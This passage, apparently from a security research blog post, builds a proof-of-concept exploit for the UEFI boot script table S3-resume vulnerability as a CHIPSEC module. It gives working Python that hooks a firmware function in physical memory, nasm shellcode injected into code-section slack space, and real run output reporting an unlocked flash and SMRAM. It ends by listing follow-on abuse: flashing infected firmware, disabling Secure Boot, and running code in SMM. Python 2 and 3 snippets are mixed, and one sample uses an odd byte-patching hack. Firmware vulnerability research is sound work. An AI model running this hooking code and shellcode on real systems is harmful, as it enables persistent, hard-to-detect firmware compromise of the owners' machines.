    EfiBootScriptWidthUint32 = 2
    EfiBootScriptWidthUint64 = 3
    EfiBootScriptWidthFifoUint8 = 4
    EfiBootScriptWidthFifoUint16 = 5
    EfiBootScriptWidthFifoUint32 = 6
    EfiBootScriptWidthFifoUint64 = 7
    EfiBootScriptWidthFillUint8 = 8
    EfiBootScriptWidthFillUint16 = 9
    EfiBootScriptWidthFillUint32 = 10
    EfiBootScriptWidthFillUint64 = 11

    boot_script_width = [
        'Uint8',
        'Uint16',
        'Uint32',
        'Uint64',
        'FifoUint8',
        'FifoUint16',
        'FifoUint32',
        'FifoUint64',
        'FillUint8',
        'FillUint16',
        'FillUint32',
        'FillUint64' ]
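
The parser above only prints the entry header for MEM_READ_WRITE entries. Going by the decompiled Execute() code (case 3 copies 0x20 bytes starting at the opcode and then computes `v42 = v35 | v42 & v36`), such an entry could be decoded roughly as follows. This is a sketch for Python 3 under my own reading of the layout, not part of the original parser; the function names are hypothetical, and the sample bytes are entry #6 from the dump in the next section.

```python
from struct import unpack

MEM_READ_WRITE = 0x03

def decode_mem_read_write(entry):
    # Assumed layout, inferred from the decompiled code:
    # +0 index, +4 size, +8 opcode, +9 width,
    # +16 address, +24 value to OR in, +32 mask to AND with
    index, size, opcode, width = unpack('<IIBB', entry[:10])
    if opcode != MEM_READ_WRITE:
        raise ValueError('Not a MEM_READ_WRITE entry: 0x%x' % opcode)
    addr, value, mask = unpack('<QQQ', entry[16:40])
    # only the two low bits of the width byte select the access size
    return index, width & 3, addr, value, mask

def apply_read_write(old, value, mask):
    # mirrors `v42 = v35 | v42 & v36` from the decompiled code
    return value | (old & mask)

# entry #6 from the boot script dump
entry = bytes.fromhex(
    '06000000' '28000000' '0300000000000000'
    '049000d1fe000000'.replace('049000d1fe000000', '0490d1fe00000000') +
    '0100000000000000' 'f800000000000000')

index, width, addr, value, mask = decode_mem_read_write(entry)
print('#%d width=%d addr=0x%x value=0x%x mask=0x%x' % (index, width, addr, value, mask))
```

For this entry the decoded operation is a byte-wide read-modify-write at 0xfed19004 that keeps the bits selected by mask 0xf8 and sets bit 0.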

Exploiting the vulnerability


The dumped boot script table has around one thousand entries; here's a text dump of some entries from the beginning of the table:
UEFI boot script addr = 0xd5f4c018

#0 len=33 MEM_WRITE
Width: Uint8, Addr: 0x00000000fec00000, Count: 1
Value: 0x0

#1 len=36 MEM_WRITE
Width: Uint32, Addr: 0x00000000fec00004, Count: 1
Value: 0x8000000

#2 len=33 MEM_WRITE
Width: Uint8, Addr: 0x00000000fec00000, Count: 1
Value: 0x10

#3 len=36 MEM_WRITE
Width: Uint32, Addr: 0x00000000fec00004, Count: 1
Value: 0x700

#4 len=36 MEM_WRITE
Width: Uint32, Addr: 0x00000000fed1f404, Count: 1
Value: 0x80

#5 len=40 MEM_READ_WRITE
000000ae: 05 00 00 00 28 00 00 00 03 02 00 00 00 00 00 00 | ................
000000be: 14 90 d1 fe 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000ce: 01 00 00 00 00 00 00 00                         | ........

#6 len=40 MEM_READ_WRITE
000000d6: 06 00 00 00 28 00 00 00 03 00 00 00 00 00 00 00 | ................
000000e6: 04 90 d1 fe 00 00 00 00 01 00 00 00 00 00 00 00 | ................
000000f6: f8 00 00 00 00 00 00 00                         | ........

#7 len=40 MEM_READ_WRITE
000000fe: 07 00 00 00 28 00 00 00 03 02 00 00 00 00 00 00 | ................
0000010e: 20 90 d1 fe 00 00 00 00 02 00 00 01 00 00 00 00 | ................
0000011e: 01 ff ff f8 00 00 00 00                         | ........

#8 len=40 MEM_READ_WRITE
00000126: 08 00 00 00 28 00 00 00 03 02 00 00 00 00 00 00 | ................
00000136: 20 90 d1 fe 00 00 00 00 00 00 00 80 00 00 00 00 | ................
00000146: ff ff ff ff 00 00 00 00                         | ........

#9 len=24 DISPATCH
Call addr: 0x00000000d5ddf260

... around 1000 other boot script table entries were skipped,
full dump is here

As you can see, this table has an EFI_BOOT_SCRIPT_DISPATCH_OPCODE entry (#9) that is used to call a firmware function at address 0xd5ddf260. The original description of the attack assumes insertion of a malicious EFI_BOOT_SCRIPT_DISPATCH_OPCODE entry into the table, but in practice, when an attacker needs to deal with a lot of different firmware versions from different manufacturers, it might be better to avoid modifying the boot script table and instead hook the machine code of the firmware functions that the original boot script calls.

Let’s start writing a PoC exploit using Python and CHIPSEC, a platform security assessment framework from Intel. A few words from its official description:


CHIPSEC is a framework for analyzing security of PC platforms including hardware, system firmware including BIOS/UEFI and the configuration of platform components. It allows creating security test suite, security assessment tools for various low level components and interfaces as well as forensic capabilities for firmware
CHIPSEC can run on any of these environments:
  • Windows (client and server)
  • Linux
  • UEFI Shell


CHIPSEC already has an excellent set of tests that cover almost all known attacks against SMM, Secure Boot, BIOS updates, flash write protection and others. So I decided to implement my boot script table vulnerability PoC as a CHIPSEC module, mostly to have a full set of BIOS exploits in one single tool. Of course, it's also possible to implement this exploit in C as a standalone Linux kernel module, a Windows driver, or whatever else suits your taste.

A new module can be created from the template:
$ cd chipsec/source/tool/chipsec/modules
$ cp module_template.py boot_script_table.py && vim boot_script_table.py
Module skeleton example:
from chipsec.module_common import *

# import required API
from chipsec.hal.uefi import *
from chipsec.hal.physmem import *

_MODULE_NAME = 'boot_script_table'

class boot_script_table(BaseModule):

    def exploit(self):

        #
        # Main exploit code.
        # Possible return values:
        # - ModuleResult.FAILED - vulnerable
        # - ModuleResult.PASSED - not vulnerable
        # - ModuleResult.ERROR - exploitation error
        #
        # ...
        #
        pass  # placeholder so that the skeleton is valid Python

    def is_supported(self):

        # TODO: check for supported hardware and/or OS
        return True

    # --------------------------------------------------------------------------
    # run(module_argv)
    # Required function: run here all tests from this module
    # --------------------------------------------------------------------------
    def run(self, module_argv):

        return self.exploit()

First we need to obtain the boot script table contents:
EFI_VAR_NAME = 'AcpiGlobalVariable'
EFI_VAR_GUID = 'af9ffd67-ec10-488a-9dfc-6cbf5ee22c2e'

def _efi_read_u32(self, name, guid):

    return dword_at(self._uefi.get_EFI_variable(name, guid, None))

def _mem_read(self, addr, size):

    # align memory reads by 1000h
    read_addr = addr & 0xfffffffffffff000
    read_size = size + addr - read_addr

    data = self._memory.read_physical_mem(read_addr, read_size)
    return data[addr - read_addr :]

# read ACPI global variable structure data
AcpiGlobalVariable = self._efi_read_u32(self.EFI_VAR_NAME, self.EFI_VAR_GUID)

# get boot script table address
data = self._mem_read(AcpiGlobalVariable, 0x20)
boot_script_addr = dword_at(data, 0x18)

# read boot script contents
boot_script = self._mem_read(boot_script_addr, 0x8000)
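
The page alignment arithmetic of _mem_read() is easy to check in isolation. Below is a small sketch for Python 3 that runs the same calculation against a fake memory reader; FAKE_BASE, FAKE_MEM and fake_read are made up for the illustration and stand in for the read_physical_mem() call used by the module.

```python
PAGE_SIZE = 0x1000

def aligned_read(read_physical_mem, addr, size):
    # round the start address down to a page boundary ...
    read_addr = addr & ~(PAGE_SIZE - 1)
    # ... read the extra leading bytes as well ...
    read_size = size + (addr - read_addr)
    data = read_physical_mem(read_addr, read_size)
    # ... and cut them off before returning
    return data[addr - read_addr:]

# fake physical memory: two pages filled with a counting pattern
FAKE_BASE = 0xd5f4c000
FAKE_MEM = bytes(bytearray(i & 0xff for i in range(2 * PAGE_SIZE)))

def fake_read(addr, size):
    # the fake backend accepts page aligned addresses only
    assert addr % PAGE_SIZE == 0
    off = addr - FAKE_BASE
    return FAKE_MEM[off : off + size]

chunk = aligned_read(fake_read, 0xd5f4c018, 0x20)
print(len(chunk), hex(chunk[0]))
```

The caller gets exactly the requested 0x20 bytes starting at 0xd5f4c018, while the backend only ever sees a page aligned address.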

Now let’s use a modified version of the BootScriptParser class to get the function address from the first EFI_BOOT_SCRIPT_DISPATCH_OPCODE table entry:
class CustomBootScriptParser(BootScriptParser):

    class AddressFound(Exception):

        def __init__(self, addr):

            self.addr = addr
       
    def process_dispatch(self, addr):

        # pass dispatch instruction operand (function address) to the caller
        raise self.AddressFound(addr)

    def parse(self, data, boot_script_addr = 0L):

        try:

            BootScriptParser.parse(self, data, \
                boot_script_addr = boot_script_addr)

        except self.AddressFound as e:

            return e.addr

        # boot script doesn't have any dispatch instructions
        return None

# parse boot script and get address of the native function to hook
func_addr = self.CustomBootScriptParser(quiet = True).parse(boot_script)

Now we need to implement machine code hooking (the classical splicing method); let’s use the capstone engine as the disassembler library. The hook function also locates unused space at the end of the code section of the executable image to place the exploit payload and the original function instructions there:
JUMP_32_LEN = 5
JUMP_64_LEN = 14

def _mem_write(self, addr, data):

    self._memory.write_physical_mem(addr, len(data), data)

def _disasm(self, data):

    import capstone

    # get length and mnemonic of the first instruction; the second
    # disasm() argument is the address of the code, not its length
    dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32)
    for insn in dis.disasm(data, 0):

        return insn.mnemonic + ' ' + insn.op_str, insn.size

def _jump_32(self, src, dst):

    print 'Jump from 0x%x to 0x%x' % (src, dst)

    addr = pack('I', (dst - src - self.JUMP_32_LEN) & 0xffffffff)
    return '\xe9' + addr

def _find_zero_bytes(self, addr, size):

    # search for zero bytes at the end of the code page
    addr = (addr & 0xfffff000) + 0x1000

    while True:
       
        if self._mem_read(addr - size, size) == '\0' * size:

            addr -= size
            break

        addr += 0x1000

    return addr

def _hook(self, addr, payload):

    if self._mem_read(addr, 1) == '\xe9':

        print 'ERROR: Already patched'
        return None

    hook_size = 0

    # read 0x40 bytes of function code
    data = self._mem_read(addr, 0x40)
   
    # disassemble the first instructions to determine the patch length
    while hook_size < self.JUMP_32_LEN:

        mnem, size = self._disasm(data[hook_size:])
        hook_size += size
   
    print '%d bytes to patch' % hook_size       

    # backup original instructions that will be replaced by patch
    data = data[:hook_size]

    # find zero memory for payload, original instructions and jump
    buff_size = len(payload) + hook_size + self.JUMP_32_LEN
    buff_addr = self._find_zero_bytes(addr, buff_size)

    print 'Found %d zero bytes at 0x%x' % (buff_size, buff_addr)

    # write payload + original instructions + jump back to hooked function
    buff = payload + data + \
           self._jump_32(buff_addr + len(payload) + hook_size, \
                         addr + hook_size)

    self._mem_write(buff_addr, buff)

    # write 32-bit jump from function to payload
    self._mem_write(addr, self._jump_32(addr, buff_addr))

    return buff_addr, buff_size, data

# compile assembly code of exploit payload
payload = Asm().compile(PAYLOAD)

# set up UEFI function hook that executes our payload
payload_addr, payload_size, old_instructions = self._hook(func_addr, payload)
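
To make the splicing arithmetic more tangible, here is a standalone sketch (Python 3) of the jmp rel32 encoding and of the trampoline layout that _hook() builds: payload, then the saved original instructions, then a jump back into the hooked function. The helper trampoline_layout is my own addition for illustration; the addresses and sizes are taken from the module output shown later in this post, where the 79-byte buffer implies a 66-byte payload.

```python
from struct import pack

JUMP_32_LEN = 5

def jump_32(src, dst):
    # jmp rel32: the displacement is relative to the end of the instruction
    rel = (dst - src - JUMP_32_LEN) & 0xffffffff
    return b'\xe9' + pack('<I', rel)

def trampoline_layout(func_addr, hook_size, payload_len, buff_addr):
    # buffer = payload + original instructions + jump back
    back_src = buff_addr + payload_len + hook_size
    back_dst = func_addr + hook_size
    return back_src, back_dst

func_addr, hook_size = 0xd5ddf260, 8
buff_addr, buff_size = 0xd5deafb1, 79
payload_len = buff_size - hook_size - JUMP_32_LEN

back_src, back_dst = trampoline_layout(func_addr, hook_size, payload_len, buff_addr)

print('hook: %s' % jump_32(func_addr, buff_addr).hex())
print('back: %s (0x%x -> 0x%x)' % (jump_32(back_src, back_dst).hex(), back_src, back_dst))
```

The backward jump has a negative displacement, which is why the result is masked to 32 bits before packing.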

Now that the code hijacking part is done, let’s write the exploit payload, which the exploit compiles with nasm via a simple Python wrapper. During its execution the payload collects very basic information about SMM and flash protection; this information will be analysed later:
[bits 32]

push    eax                    ; Save original registers values.
push    edx
push    esi

call    _label                 ; Jump to the main payload code.

db      0ffh
dd      0                      ; Shellcode call counter.
db      0                      ; Data area to store BIOS_CNTL value.
dd      0                      ; Data area to store TSEGMB value.

_label:

pop     esi                    ; Get shellcode data area address.
inc     esi
inc     dword [esi]            ; Increment shellcode call counter.

cmp     byte [esi], 1          ; Exit from payload if it was already called.
jne     _end

mov     eax, 0x8000f8dc        ; BIOS_CNTL register is accessible via PCI config space:
mov     dx, 0xcf8              ; bus = 0, dev = 0x1f, func = 0, offset = 0xdc.
out     dx, eax                ; Set up PCI read address.

mov     dx, 0xcfc
in      al, dx                 ; Read BIOS_CNTL value.
mov     byte [esi + 4], al     ; Save BIOS_CNTL value to payload data area.

mov     eax, 0x800000b8        ; TSEGMB is accessible via PCI config space as well:
mov     dx, 0xcf8              ; bus = 0, dev = 0, func = 0, offset = 0xb8.
out     dx, eax                ; Set up PCI read address.

mov     dx, 0xcfc
in      eax, dx                ; Read TSEGMB value.
mov     dword [esi + 5], eax   ; Save TSEGMB value to payload data area.

_end:

pop     esi                    ; End of payload, restore registers values.
pop     edx
pop     eax

;
; Here goes original instructions from the hooked function code 
; and 32-bit jump to function_addr + patch_len.
;
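
The two magic constants that the payload writes to port 0xcf8 follow the legacy PCI configuration address format: an enable bit, then bus, device and function numbers, then the dword aligned register offset. A short sketch that rebuilds them (Python 3, the function name pci_cf8_address is my own):

```python
def pci_cf8_address(bus, dev, func, offset):
    # legacy PCI configuration mechanism: value for the 0xcf8 address port
    if not (0 <= bus <= 0xff and 0 <= dev <= 0x1f and 0 <= func <= 7):
        raise ValueError('Invalid PCI device address')
    if not 0 <= offset <= 0xff:
        raise ValueError('Invalid register offset')
    return (0x80000000 |        # enable bit
            (bus << 16) |
            (dev << 11) |
            (func << 8) |
            (offset & 0xfc))    # register offset, dword aligned

# BIOS_CNTL: bus = 0, dev = 0x1f, func = 0, offset = 0xdc
print(hex(pci_cf8_address(0, 0x1f, 0, 0xdc)))

# TSEGMB: bus = 0, dev = 0, func = 0, offset = 0xb8
print(hex(pci_cf8_address(0, 0, 0, 0xb8)))
```

Both offsets are already dword aligned, so reading a byte or a dword from port 0xcfc returns the register starting at its lowest byte.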

Now we can trigger payload execution using the rtcwake command line utility, which is available out of the box on most modern Linux systems. Once the payload has been executed, we need to read its data area back from memory and extract the recorded BIOS_CNTL and TSEGMB register values:
# locate payload data area (9 zero bytes)
data_offset = payload.find('\xff' + '\0' * (4 + 1 + 4))

# read payload data area contents from physical memory
data = self._mem_read(payload_addr + data_offset + 1, 4 + 1 + 4)

# parse binary structure
count, BIOS_CNTL, TSEGMB = unpack('=IBI', data)

if count == 0:

    print 'ERROR: shellcode was not executed during S3 resume'
    return ModuleResult.ERROR
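
The same lookup and unpacking can be tried without real hardware. In the sketch below (Python 3) the stub bytes are only a hypothetical stand-in for the compiled payload, and the data area contents are simulated with the values that appear in the module output later in this post.

```python
from struct import pack, unpack

DATA_LEN = 4 + 1 + 4   # call counter, BIOS_CNTL, TSEGMB

def find_data_area(payload):
    # the data area follows the 0xff marker byte and is zero filled at build time
    marker_off = payload.find(b'\xff' + b'\0' * DATA_LEN)
    if marker_off < 0:
        raise ValueError('Payload data area not found')
    return marker_off + 1

def parse_data_area(data):
    # '<' means little-endian without padding, so the structure takes 9 bytes
    return unpack('<IBI', data)

# hypothetical stand-in for the compiled payload: prologue, data area, epilogue
stub = b'\x50\x52\x56\xe8\x0a\x00\x00\x00' + b'\xff' + b'\0' * DATA_LEN + b'\x5e'
data_offset = find_data_area(stub)

# simulated data area contents after a single payload run
after_resume = pack('<IBI', 1, 0x28, 0xd7000000)
count, BIOS_CNTL, TSEGMB = parse_data_area(after_resume)

print('offset = %d, count = %d, BIOS_CNTL = 0x%x, TSEGMB = 0x%x' % \
      (data_offset, count, BIOS_CNTL, TSEGMB))
```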

According to the original paper, the BLE bit of BIOS_CNTL is not set during boot script execution, and neither is the lock bit of TSEGMB. Let's implement these checks with the obtained values:
# get bit at given position
bitval = lambda val, b: 0L if val & (1L << b) == 0 else 1L
success = True

# check if access to flash is locked with bios lock enable bit of BIOS_CNTL
if bitval(BIOS_CNTL, 1) == 0:

    print '[!] Bios lock enable bit is not set'
    success = False

# check if access to SMRAM via DMA is locked with TSEGMB lock bit
if TSEGMB & 1 == 0:

    print '[!] SMRAM is not locked'
    success = False

return ModuleResult.PASSED if success else ModuleResult.FAILED
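
As a quick sanity check, the same two bit tests can be run outside of CHIPSEC. This sketch (Python 3, helper names are my own) feeds them the register values reported on my test system in the output below:

```python
BIOS_CNTL_BLE_BIT = 1   # BIOS lock enable
TSEGMB_LOCK_BIT = 0     # TSEGMB lock

def bit(val, n):
    # get bit at given position
    return (val >> n) & 1

def check_protection(bios_cntl, tsegmb):
    findings = []
    if bit(bios_cntl, BIOS_CNTL_BLE_BIT) == 0:
        findings.append('Bios lock enable bit is not set')
    if bit(tsegmb, TSEGMB_LOCK_BIT) == 0:
        findings.append('SMRAM is not locked')
    return findings

for finding in check_protection(0x28, 0xd7000000):
    print('[!] ' + finding)
```

An empty list means that both bits were set at the moment the payload ran.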

Obviously, it would be better to examine the platform state during shellcode execution more thoroughly: there are a lot of other BIOS and SMM security features, not only the two bits described above. To get complete pwnage of SPI flash on all motherboards available on the market, we need to defeat another layer in addition to the BLE bit: SPI protected ranges. Unfortunately, I currently have problems reading the SPIBAR contents on my motherboard, which is required to get SPI protected ranges information; the corresponding CHIPSEC module and function also hang the whole system at this point. From other sources I know that on my motherboard SPI protected ranges should be properly configured before boot script execution (i.e., flash is secured), but once these technical difficulties are solved I still plan to add protected ranges checking to my module. It's also quite possible that the SPIBAR access problem is somehow related to the two-chip configuration of the motherboard (I have seen such boards only a few times, and you?).

Running CHIPSEC with the boot script table PoC module, and its output on my test system:
# python chipsec_main.py --module boot_script_table
[helper] Loaded OS helper: chipsec.helper.linux.helper

################################################################
##                                                            ##
##  CHIPSEC: Platform Hardware Security Assessment Framework  ##
##                                                            ##
################################################################
Version 1.1.3

****** Chipsec Linux Kernel module is licensed under GPL 2.0

[*] loading platform config from '/root/chipsec/source/tool/chipsec/cfg/common.xml'..
[*] loading platform config from '/root/chipsec/source/tool/chipsec/cfg/avn.xml'..

OS      : Linux 3.2.60 #23 SMP Sun Jan 4 03:02:06 EST 2015 x86_64
Platform: Desktop 2nd Generation Core Processor (Sandy Bridge CPU / Cougar Point PCH)
          VID: 8086
          DID: 0100
CHIPSEC : 1.1.3

[+] loaded chipsec.modules.boot_script_table
[*] running loaded modules ..

[*] running module: chipsec.modules.boot_script_table
[*] Module path: /root/chipsec/source/tool/chipsec/modules/boot_script_table.py
[x][ =======================================================================
[x][ Module: UEFI boot script table vulnerability exploit
[x][ =======================================================================
[*] AcpiGlobalVariable = 0xd5f53f18
[*] UEFI boot script addr = 0xd5f4c018
[*] Target function addr = 0xd5ddf260
8 bytes to patch
Found 79 zero bytes at 0xd5deafb1
Jump from 0xd5deaffb to 0xd5ddf268
Jump from 0xd5ddf260 to 0xd5deafb1
Going to S3 sleep for 10 seconds ...
rtcwake: wakeup from "mem" using /dev/rtc0 at Mon Feb  2 08:07:07 2015
[*] BIOS_CNTL = 0x28
[*] TSEGMB = 0xd7000000
[!] Bios lock enable bit is not set
[!] SMRAM is not locked
[!] Your system is VULNERABLE

[CHIPSEC] ***************************  SUMMARY  ***************************
[CHIPSEC] Time elapsed          15.136
[CHIPSEC] Modules total         1
[CHIPSEC] Modules failed to run 0:
[CHIPSEC] Modules passed        0:
[CHIPSEC] Modules failed        1:
[-] FAILED: chipsec.modules.boot_script_table
[CHIPSEC] Modules with warnings 0:
[CHIPSEC] Modules skipped 0:
[CHIPSEC] *****************************************************************
[CHIPSEC] Version:   1.1.3

Full exploit source code is available on GitHub.

To profit from exploitation of this vulnerability, it's possible to do the following things:

  • If BLE is not set and the platform firmware does not use SPI protected ranges, or they are not configured yet, an attacker can run shellcode that writes an infected firmware image into the flash.
  • If BLE is not set and SPI protected ranges are properly configured at the moment of boot script table execution, shellcode can still do a lot of evil things with UEFI variables, for example, disable Secure Boot or trigger other firmware vulnerabilities.
  • If TSEGMB is not locked, shellcode can lock it with a random/incorrect address; later, the attacker can use the DMA buffer hijack technique to get r/w access to SMRAM via DMA and run arbitrary code in SMM (I think it might be a good direction for my further research). This technique was described in the "Subverting the Xen hypervisor" talk by Rafal Wojtczuk.